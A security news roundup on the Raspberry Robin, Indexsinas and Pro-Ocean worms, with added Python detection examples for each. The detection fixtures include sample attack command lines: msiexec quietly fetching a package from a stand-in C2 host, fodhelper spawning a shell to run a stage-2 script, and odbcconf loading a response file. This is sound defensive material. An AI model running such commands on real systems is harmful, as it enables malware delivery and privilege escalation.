
Microsoft Detects Raspberry Robin Worm in Windows Networks

According to Microsoft, a recently identified Windows worm has been found on the networks of hundreds of organizations across numerous industry sectors.

The malware, called Raspberry Robin, spreads via infected USB devices and was first reported by Red Canary intelligence analysts in September 2021. In early November, cybersecurity company Sekoia observed it using QNAP NAS devices as command and control (C2) servers, while Microsoft stated it had found malicious artefacts tied to this worm created as early as 2019.

Redmond's findings are consistent with those of Red Canary's Detection Engineering team, which discovered this worm on the networks of several clients, including some in the technology and manufacturing industries. Although Microsoft observed the malware communicating with Tor network addresses, the threat actors have yet to exploit the access they gained to their victims' networks.

As already mentioned, Raspberry Robin spreads to new Windows systems via infected USB drives containing a malicious .LNK file. When the USB device is plugged in and the user clicks the shortcut, the worm spawns an msiexec process via cmd.exe to launch a malicious file stored on the infected drive. It infects new Windows devices, communicates with its command and control (C2) servers, and executes malicious payloads using several legitimate Windows utilities: 
  • fodhelper (a trusted binary for managing features in Windows settings),
  • msiexec (command line Windows Installer component),
  • and odbcconf (a tool for configuring ODBC drivers).
"While msiexec.exe downloads and executes legitimate installer packages, adversaries also leverage it to deliver malware," Red Canary researchers explained. "Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes."
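The chain described above (a shell spawning msiexec against a remote package, odbcconf and fodhelper doing things they never do in normal use) is what a detection engineer would hunt for in process-creation telemetry. The Python below is an added example, not code from Microsoft or Red Canary: it runs a few rules over constructed Sysmon/4688-style records. The msiexec rule follows the Red Canary quote directly; the odbcconf switches and the "fodhelper should never have a child process" heuristic are generic LOLBin patterns assumed here, not behaviour the page attributes to Raspberry Robin.

```python
"""Flag process-creation records matching the Raspberry Robin LOLBin chain.

Records are dicts with parent image, image and command line, the fields you
would extract from Sysmon Event ID 1 or Security Event 4688. The events below
are constructed for this example, not real telemetry.
"""
import re
from pathlib import PureWindowsPath

SAMPLE_EVENTS = [
    # cmd.exe launching msiexec with a remote package: msiexec used for C2 reach-out
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec /q /i "http://example-c2.test:8080/pkg.msi"'},
    # benign: interactive install of a local package
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'msiexec /i "C:\Users\alice\Downloads\7z2301-x64.msi"'},
    # odbcconf loading code via a response file (generic LOLBin pattern, assumed)
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\odbcconf.exe",
     "cmdline": r"odbcconf -f C:\Users\Public\x.rsp"},
    # fodhelper spawning a shell (assumed UAC-bypass shape; fodhelper has no legitimate children)
    {"parent": r"C:\Windows\System32\fodhelper.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\Users\Public\stage2.bat"},
    # benign: fodhelper started by the Settings app
    {"parent": r"C:\Windows\ImmersiveControlPanel\SystemSettings.exe",
     "image": r"C:\Windows\System32\fodhelper.exe",
     "cmdline": "fodhelper.exe"},
]

URL_RE = re.compile(r"\bhttps?://", re.IGNORECASE)
QUIET_RE = re.compile(r"\s[/-]q(uiet|n|b)?\b", re.IGNORECASE)
# odbcconf switches that execute code: -a {REGSVR dll} registers a DLL, -f runs a response file
ODBCCONF_LOAD_RE = re.compile(r"[/-]\s*(a\s*\{\s*regsvr\b|f\b)", re.IGNORECASE)


def basename(path):
    """Case-folded file name of a Windows path (works on any host OS)."""
    return PureWindowsPath(path).name.lower()


def classify(event):
    """Return the rule names that fire for one process-creation record."""
    parent, image = basename(event["parent"]), basename(event["image"])
    cmd = event["cmdline"]
    hits = []
    if image == "msiexec.exe" and URL_RE.search(cmd):
        hits.append("msiexec_remote_package")       # installer fetched over the network
    if image == "msiexec.exe" and parent == "cmd.exe" and QUIET_RE.search(cmd):
        hits.append("msiexec_quiet_from_cmd")       # silent install spawned by a shell
    if image == "odbcconf.exe" and ODBCCONF_LOAD_RE.search(cmd):
        hits.append("odbcconf_code_load")
    if parent == "fodhelper.exe":
        hits.append("fodhelper_child_process")
    return hits


def scan(events):
    """Index -> rule hits, for events that triggered at least one rule."""
    return {i: hits for i, e in enumerate(events) if (hits := classify(e))}


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["cmdline"], "->", ", ".join(hits))
```

The msiexec rules will also catch legitimate software deployment that pulls packages from a URL, so in production pair them with an allow-list of known deployment hosts rather than alerting on every remote install.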

Security researchers who have observed Raspberry Robin in the wild have yet to link the malware to a threat group and are still working to determine its operators' ultimate objective. Nonetheless, Microsoft has labelled this campaign as high-risk, given that the attackers could download and deploy additional malware inside the victims' networks and escalate their privileges at any time.

Indexsinas SMB Worm Attacks Vulnerable Environments


The Indexsinas SMB worm is targeting vulnerable environments, researchers warn, with a focus on the healthcare, hospitality, education, and telecommunications industries. Its ultimate objective is to drop crypto miners on compromised machines. 

Indexsinas, aka NSABuffMiner, has been active since 2019. It uses the leaked Equation Group arsenal, namely the EternalBlue and EternalRomance exploits and the DoublePulsar backdoor, to break into Windows SMB shares, and it moves laterally to take over entire environments aggressively. 

“Propagation is achieved through the combination of an open-source port scanner and three Equation Group exploits – EternalBlue, DoublePulsar, and EternalRomance,” according to a Guardicore Labs analysis. 

Since 2019, Indexsinas has built a broad infrastructure of over 1,300 devices acting as attack sources, each responsible for only a handful of attacks (most likely compromised systems themselves, Guardicore observed, concentrated in India, the USA, and Vietnam). To date, almost 2,000 distinct attacks have been recorded in Guardicore's telemetry. 

Learning more about the attackers behind Indexsinas is difficult, as they cover their tracks carefully. 

“The Indexsinas attackers are careful and calculated,” according to the firm. “The campaign has been running for years with the same command-and-control domain, hosted in South Korea. The [command-and-control] C2 server is highly protected, patched, and exposes no redundant ports to the internet. The attackers use a private mining pool for their crypto mining operations, which prevents anyone from accessing their wallets’ statistics.” 

According to Guardicore Labs, the attack begins when a machine is compromised using the NSA's tools. These exploits run code in the victim's kernel and can inject payloads into user mode using asynchronous procedure calls (APCs). 

Researchers noted, “Indexsinas uses the exploits to inject code to either explorer.exe or lsass.exe. The injected payloads – EternalBlue.dll for 32-bit and DoublePulsar.dll for 64-bit – download three executable files from the main C2 server.”

Among the downloaded files is a DLL stored as a reversed Portable Executable, which is a variant of the Gh0stCringe remote access tool (RAT). 

The first of the RAT's two routines installs the RAT, while the second implements its main functionality: handling C2 commands and reporting machine information, including the computer name, malware group ID, installation date, and CPU details. 
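Storing a payload as a reversed PE defeats naive signature matching, because neither the "MZ" nor the "PE\0\0" marker appears at its expected offset until the bytes are put back in order. The Python below is an added example, not code from Guardicore's report: it assumes "reversed" means the embedded DLL's byte order is flipped end to end, detects that case by validating the DOS and NT headers of the reversed candidate, and checks the IMAGE_FILE_DLL flag on the recovered image. The sample blob is a constructed PE skeleton with valid headers, not a real binary.

```python
"""Recover a PE image whose bytes were stored in reverse order.

The sample below is constructed: a minimal, non-runnable PE skeleton whose
DOS header, e_lfanew pointer and "PE\0\0" signature are present, so that the
checks have real header structure to validate against.
"""
import struct

IMAGE_FILE_DLL = 0x2000        # COFF Characteristics bit: the image is a DLL
COFF_CHARACTERISTICS_OFF = 18  # offset of Characteristics within the COFF file header


def build_fake_pe():
    """Construct a minimal PE-shaped blob (not a working binary) for demonstration."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)        # e_lfanew: NT headers at offset 0x80
    stub = bytes(0x80 - len(dos))                  # padding where the DOS stub would be
    # COFF header: Machine=i386, 1 section, no timestamp/symbols, 0xE0-byte optional
    # header, Characteristics = EXECUTABLE_IMAGE | 32BIT_MACHINE | DLL
    coff = struct.pack("<HHIIIHH", 0x014C, 1, 0, 0, 0, 0xE0, 0x2102)
    return bytes(dos) + stub + b"PE\0\0" + coff + b"\0" * 32


def looks_like_pe(blob):
    """True if blob starts with a DOS header whose e_lfanew points at 'PE\\0\\0'."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return e_lfanew + 4 <= len(blob) and blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def unreverse_pe(blob):
    """Return the PE in normal byte order, or None if neither orientation is a PE."""
    if looks_like_pe(blob):
        return blob                       # already a normal PE, nothing to undo
    candidate = blob[::-1]                # the obfuscation assumed here: whole-file reversal
    return candidate if looks_like_pe(candidate) else None


def is_dll(pe):
    """Check the IMAGE_FILE_DLL bit in the COFF Characteristics of a normal-order PE."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    characteristics = struct.unpack_from("<H", pe, e_lfanew + 4 + COFF_CHARACTERISTICS_OFF)[0]
    return bool(characteristics & IMAGE_FILE_DLL)


if __name__ == "__main__":
    stored = build_fake_pe()[::-1]        # what the dropper would carry on disk
    recovered = unreverse_pe(stored)
    print("reversed PE detected:", recovered is not None, "| DLL:", is_dll(recovered))
```

On a real sample, hand the recovered bytes to a proper PE parser rather than trusting these two header checks; they are enough to decide orientation, not to validate the image.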

The files iexplore.exe and services.exe, meanwhile, install two services using a tool that masquerades as the Windows svchost.exe. The first service drops the crypto miner, whereas the second runs the miner module. 

Another payload downloaded in the initial stage is c64.exe, which in turn drops two files. One of them is the executable ctfmon.exe, the propagation tool. 

“Ctfmon.exe is responsible for finding potential victims and exploiting them using Equation Group’s tools – and it does that extremely thoroughly,” researchers said. “It uses exploits for both 32-bit and 64-bit machines and scans both RPC (TCP 139) and SMB (TCP 445) ports. Moreover, it tries to move laterally within the organizational network as well as spread across the internet.” 

A scheduled task runs a batch script that installs a service. The service launches a second batch script that performs the port scanning and exploitation. 

The batch scripts in these flows also uninstall competing miners' services, kill their processes, and delete their files. 
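Every persistence step above (services installed by a fake svchost.exe, a propagation tool named ctfmon.exe, droppers called iexplore.exe and services.exe) reuses the name of a genuine Windows binary while living somewhere a genuine one never would. That is what a defender can key on in service-install events. The Python below is an added example, not Guardicore's code: it parses constructed lines rendered from Windows System log Event ID 7045 and flags a service image that borrows a system binary's name outside a Windows system directory, or that runs from a user-writable location. The service names and paths in the samples are invented.

```python
"""Triage new-service events for binaries masquerading as Windows components.

Input lines are a constructed pipe-delimited rendering of Windows System log
Event ID 7045 (a service was installed). The rule flags an ImagePath whose file
name is that of a core Windows binary but whose directory is not a Windows
system directory, plus any service image in a user-writable location.
"""
import re
from pathlib import PureWindowsPath

# Names the Indexsinas droppers reuse (svchost.exe, services.exe, iexplore.exe,
# ctfmon.exe) plus two other frequent masquerade targets
SYSTEM_BINARY_NAMES = {"svchost.exe", "services.exe", "iexplore.exe", "ctfmon.exe",
                       "lsass.exe", "explorer.exe"}
TRUSTED_DIRS = {r"c:\windows", r"c:\windows\system32", r"c:\windows\syswow64",
                r"c:\program files\internet explorer",
                r"c:\program files (x86)\internet explorer"}
WRITABLE_DIRS = (r"c:\programdata", r"c:\users", r"c:\windows\temp")

SAMPLE_7045 = [  # constructed events, not real log data
    r"7045|ServiceName=WinDefenderHelper|ImagePath=C:\ProgramData\Microsoft\svchost.exe -k netsvcs",
    r"7045|ServiceName=Spooler|ImagePath=%SystemRoot%\System32\spoolsv.exe",
    r'7045|ServiceName=ctfsvc|ImagePath="C:\Users\Public\ctfmon.exe" /scan',
    r'7045|ServiceName=VendorAgent|ImagePath="C:\Program Files\Vendor\agent.exe" --run',
    r"7045|ServiceName=BITS|ImagePath=%SystemRoot%\System32\svchost.exe -k netsvcs",
]

EXE_RE = re.compile(r'^\s*"?([^"]*?\.exe)', re.IGNORECASE)


def parse_7045(line):
    """Return (ServiceName, ImagePath) from one rendered 7045 line."""
    fields = dict(part.split("=", 1) for part in line.split("|")[1:])
    return fields["ServiceName"], fields["ImagePath"]


def extract_exe(image_path):
    """Pull the executable path out of an ImagePath, expanding %SystemRoot%/%windir%."""
    expanded = re.sub(r"%(systemroot|windir)%", r"C:\\Windows", image_path, flags=re.IGNORECASE)
    m = EXE_RE.match(expanded)
    return m.group(1) if m else expanded.strip().strip('"').split()[0]


def assess(exe):
    """Reasons this service image is suspicious; empty list if none."""
    p = PureWindowsPath(exe)
    name, parent = p.name.lower(), str(p.parent).lower()
    reasons = []
    if name in SYSTEM_BINARY_NAMES and parent not in TRUSTED_DIRS:
        reasons.append("system_binary_name_outside_system_dir")
    if any(parent == d or parent.startswith(d + "\\") for d in WRITABLE_DIRS):
        reasons.append("user_writable_location")
    return reasons


def triage(lines):
    """(service, exe, reasons) for every line that raises at least one reason."""
    findings = []
    for line in lines:
        service, image_path = parse_7045(line)
        exe = extract_exe(image_path)
        if reasons := assess(exe):
            findings.append((service, exe, reasons))
    return findings


if __name__ == "__main__":
    for service, exe, reasons in triage(SAMPLE_7045):
        print(f"{service}: {exe} -> {', '.join(reasons)}")
```

The same two checks apply to scheduled-task creation events (Security 4698) for the batch scripts the page describes; only the field names differ.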

“It is crucial that network administrators, IT teams, and security personnel be able to easily identify assets and the services they run,” they explained. “Specifically, it should be easy to spot internet-facing servers, SMB included. With visibility in place, network admins would want to limit the access from and to different assets and the network services they expose.” 

Corporate and production networks, for example, should be segmented. Policies can also be applied to secure an organization's SMB servers, such as blocking SMB access to and from the internet, or allowing only specified IP addresses to reach the company's internet-facing file server. This helps prevent Indexsinas infections.

Rocke Group’s Pro Ocean Crypto-jacking Malware now Comes with Worm Feature


The Rocke Group has used cloud-targeted malware to carry out Monero crypto-jacking attacks, first documented in 2019 by Unit 42 researchers. Since then, cybersecurity firms have tracked the malware closely, which hindered the group's crypto-jacking activity. The threat actors have since updated the malware: researchers discovered a modified version in use by the Rocke Group, a cybercrime gang that crypto-jacks cloud infrastructure. 

The malware, known as "Pro-Ocean" and first detected in 2019, now includes a "worm" feature and the detection-evasion capabilities of a rootkit. 

Pro-Ocean exploits well-known vulnerabilities in cloud applications; in the samples studied it attacked Apache ActiveMQ, Oracle WebLogic (CVE-2017-10271), and Redis. If it finds itself running on Tencent Cloud or Alibaba Cloud, it disables the providers' monitoring agents, reusing the code from the earlier version, to avoid detection. Once installed, it kills any process that is using the CPU heavily so that it can devote 100% of the CPU to mining Monero. 

“This malware is an example that demonstrates that cloud providers’ agent-based security solutions may not be enough to prevent evasive malware targeted at public cloud infrastructure,” said Aviv Sasson. “As we saw, this sample can delete some cloud providers’ agents and evade their detection,” Sasson further added. 

The malware is made up of four components: a rootkit module, which installs a rootkit and other malicious utilities; an XMRig mining module; a watchdog module with two Bash scripts (which check that the malware is still running and look for processes that use the CPU heavily); and the worm module described below. 

The "worm" feature is a recent Pro-Ocean addition. The malware now retrieves the public IP address of the victim's machine with a Python infection script, using an online IP-lookup service. The script then attempts to infect every machine in the same /16 subnet (e.g. 10.0.X.X). Pro-Ocean has also added new rootkit capabilities that cloak its malicious activity. 
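A host that has just learned its public IP and starts firing exploits at all 65,534 neighbours in its /16 produces a traffic shape that is easy to spot in flow logs: one source, many distinct destinations in its own /16, a handful of service ports. The Python below is an added example, not code from Unit 42 or from Pro-Ocean: sweep_range() computes the range the worm would enumerate from a public IP, and detect_sweeps() flags sources with a high fan-out into that range. The flow records are constructed, and the port numbers are the defaults for the services the page names (Redis, WebLogic, ActiveMQ), assumed here rather than taken from the report.

```python
"""Detect a host sweeping its own /16 the way the Pro-Ocean worm module does.

sweep_range() gives the network the worm would enumerate from a public IP;
detect_sweeps() looks for a source contacting many distinct neighbours in that
range on the service ports the page names. Flow records are constructed; the
port numbers are the services' defaults, assumed rather than taken from the report.
"""
import ipaddress
from collections import defaultdict

TARGET_PORTS = {6379: "redis", 7001: "weblogic", 8161: "activemq", 61616: "activemq"}


def sweep_range(ip):
    """The /16 containing ip, i.e. every 'X.Y.*.*' host the worm will try."""
    return ipaddress.ip_interface(f"{ip}/16").network


def detect_sweeps(flows, threshold=16):
    """src -> {targets, ports} for sources hitting >= threshold distinct /16 neighbours."""
    neighbours, services = defaultdict(set), defaultdict(set)
    for src, dst, dport in flows:
        # only exploit-relevant ports, only destinations inside the source's own /16
        if dport in TARGET_PORTS and ipaddress.ip_address(dst) in sweep_range(src):
            neighbours[src].add(dst)
            services[src].add(TARGET_PORTS[dport])
    return {src: {"targets": len(dsts), "ports": sorted(services[src])}
            for src, dsts in neighbours.items() if len(dsts) >= threshold}


def _constructed_flows():
    """(src, dst, dport) tuples invented for this example."""
    flows = []
    for i in range(40):  # an infected host working through its own /16 (203.0.0.0/16)
        dst = f"203.0.{100 + i // 10}.{10 + i % 10}"
        flows += [("203.0.113.7", dst, 6379), ("203.0.113.7", dst, 7001)]
    # a benign neighbour: two web calls inside the /16, one Redis call outside it
    flows += [("203.0.113.20", "203.0.113.5", 443),
              ("203.0.113.20", "203.0.113.6", 443),
              ("203.0.113.20", "198.51.100.9", 6379)]
    return flows


SAMPLE_FLOWS = _constructed_flows()

if __name__ == "__main__":
    print("worm would sweep:", sweep_range("203.0.113.7"))
    for src, info in detect_sweeps(SAMPLE_FLOWS).items():
        print(f"{src} contacted {info['targets']} neighbours on {info['ports']}")
```

The threshold of 16 distinct neighbours is a starting point, not a tuned value; on a /16 shared with many tenants, lower it and add a time window so that a slow sweep is not missed.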

“It does this by blindly executing public exploits one after the other in the hope of finding unpatched software it can exploit,” said Sasson. The researchers said they believe the Rocke Group will keep modifying its malware, particularly as the cloud becomes an ever more lucrative target for attackers.